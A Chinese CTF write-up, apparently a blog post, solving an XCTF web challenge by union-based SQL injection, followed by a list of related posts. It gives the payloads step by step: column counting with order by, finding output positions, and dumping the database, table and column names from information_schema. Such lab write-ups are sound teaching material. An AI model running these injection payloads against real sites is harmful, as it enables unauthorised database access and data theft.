攻防世界web进阶区(2)--记一次sql注入
bluet00 2020-02-14
题目地址:http://111.198.29.45:56094
这是一道sql注入题。
试试1‘ order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段。
接下来判断输出点,即输入1‘ union select 1,2,3#,发现2与3的位置是输出点。
爆数据库名: 1‘ union select 1,database(),3#
1‘ union select 1,2,table_name from information_schema.tables where table_schema=‘news‘#查询 news 数据库中的表
1‘ union select 1,2,column_name from information_schema.columns where table_schema=‘news‘ and table_name=‘secret_table‘#查询列名
得flag:
相关推荐
ALiDan 0喜欢 / 0评论 2020-07-27
qshpeng 0喜欢 / 0评论 2020-07-26
世樹 0喜欢 / 0评论 2020-07-17
chenjiazhu 0喜欢 / 0评论 2020-07-08
一对儿程序猿 0喜欢 / 0评论 2020-07-04
明月清风精进不止 0喜欢 / 0评论 2020-06-13
godfather 0喜欢 / 0评论 2020-06-13
ItBJLan 0喜欢 / 0评论 2020-06-11
tanrong 0喜欢 / 0评论 2020-06-11
ALiDan 0喜欢 / 0评论 2020-06-11
码墨 0喜欢 / 0评论 2020-06-09
世樹 0喜欢 / 0评论 2020-06-05
lt云飞扬gt 0喜欢 / 0评论 2020-06-03
godfather 0喜欢 / 0评论 2020-06-03
qshpeng 0喜欢 / 0评论 2020-05-11
明月清风精进不止 0喜欢 / 0评论 2020-05-07
gwn00 0喜欢 / 0评论 2020-05-07
sixyearsorless 0喜欢 / 0评论 2020-05-07
一对儿程序猿 0喜欢 / 0评论 2020-05-06
liuyang000 0喜欢 / 0评论 2020-04-20
一对儿程序猿 0喜欢 / 0评论 2020-04-20
ItBJLan 0喜欢 / 0评论 2020-04-19
sunlizhen 0喜欢 / 0评论 2020-04-10
bluetears 0喜欢 / 0评论 2020-04-09
liuyang000 0喜欢 / 0评论 2020-04-07
dayi 0喜欢 / 0评论 2020-03-28
wkwanglei 0喜欢 / 0评论 2020-03-27
qshpeng 0喜欢 / 0评论 2020-03-26
lightlanguage 0喜欢 / 0评论 2020-03-24
sswqycbailong 0喜欢 / 0评论 2020-03-07
明月清风精进不止 0喜欢 / 0评论 2020-03-06
qshpeng 0喜欢 / 0评论 2020-03-06
lt云飞扬gt 0喜欢 / 0评论 2020-03-04
liuyang000 0喜欢 / 0评论 2020-03-03
xuanlvhaoshao 0喜欢 / 0评论 2020-03-01
gwn00 0喜欢 / 0评论 2020-03-01
xuanlvhaoshao 0喜欢 / 0评论 2020-02-21
seteor 0喜欢 / 0评论 2020-02-20
snowguy 0喜欢 / 0评论 2020-02-18
明月清风精进不止 0喜欢 / 0评论 2020-02-17
ALiDan 0喜欢 / 0评论 2020-02-16
gwn00 0喜欢 / 0评论 2020-02-16
tanrong 0喜欢 / 0评论 2020-02-15
gwn00 0喜欢 / 0评论 2020-02-14
gwn00 0喜欢 / 0评论 2020-02-01